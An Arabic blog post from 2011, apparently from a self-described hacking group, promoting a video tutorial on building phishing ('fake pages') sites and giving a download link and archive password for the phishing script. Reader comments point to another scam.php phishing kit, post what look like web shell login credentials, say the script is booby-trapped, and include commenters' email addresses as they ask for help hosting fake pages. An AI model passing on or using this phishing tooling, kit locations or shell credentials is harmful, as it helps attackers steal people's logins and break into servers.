الرئيسية » » شرح عمل موقع صفحات مزورة =سكربت عصابة المخترقين

شرح عمل موقع صفحات مزورة =سكربت عصابة المخترقين

Written By عصابة المخترقين on الأحد، 14 أغسطس 2011 | 11:32 م


السلام عليكم اخواني زوار موقع عصابة المخترقين 

شرحنا اليوم كيفية عمل موقع صفحات مزورة 
طبعا الشرح فيديوا


.: لتحميل السكربت :.

http://www.mediafire.com/?1w5rpsz59s6ciq2

paswored: muradblood
-------------------------------------------------------------
جميع الحقوق محفوظة قابلة للنشر
موقع عصابة المخترقين 
www.3sabh.com

11 التعليقات:

  1. شرح جميل ورائع

    ردحذف
  2. ما الموقع الذي استخذمته؟

    ردحذف
  3. مش عارف اعمل موقع ممكن ضفنى فى اميلك golden_net47@yahoo.com

    ردحذف
  4. hhhhh


    fcharaja.com/scama

    scam.php ;;)

    جد مبتدئين

    ردحذف
  5. shell

    $tacfgd['uname'] = 'mr.d4rk';

    $tacfgd['pword'] = 'iloveindia';
    log_out.php

    ردحذف
  6. يا معلم في ملف ناقص هم في الفيديو عددهم تسعة والي حملته عددهم 8 ممكن ترفعه مره تانية وشكرا علي مجهودك الرائع

    ردحذف
  7. مش حرام عليك 100/100
    ملغوم إتقي ربك

    ردحذف
  8. مرحبا يا عصابة المخترقين ممكن حدا يعلمني طريقة كيف اربط الصفحات المزورة بلموقع انا بدي ارفع الموقع على سيرفر والصفحات على سيرفر تاني ممكن حدا يعلمني يا غوالي وانا رح اكونممنونلو والله وهاي اميلي a2io@hotmail.com

    ردحذف
  9. انا عاوز هاي الطريقة ضروري جداًً ل اصحاب المعرفة الى بعرف يضيفني عندو يا غوالي

    ردحذف
  10. السكريبت ملغووم هههههههههههههههه واحقيقة انا كتافق مع لي رافع الملف ملغوم لان بدل جهد كبيييييير جدا في صنع السكريبت وياتي واحد بيضع فيه اسمه

    ردحذف

 
جميع الحقوق محفوضة موقع عالم مشاكل و حلول الحاسوب مستضاف لدى بلوجر
Created by Maskolis Published by Mas Template تطوير وتعديل رضا الخشن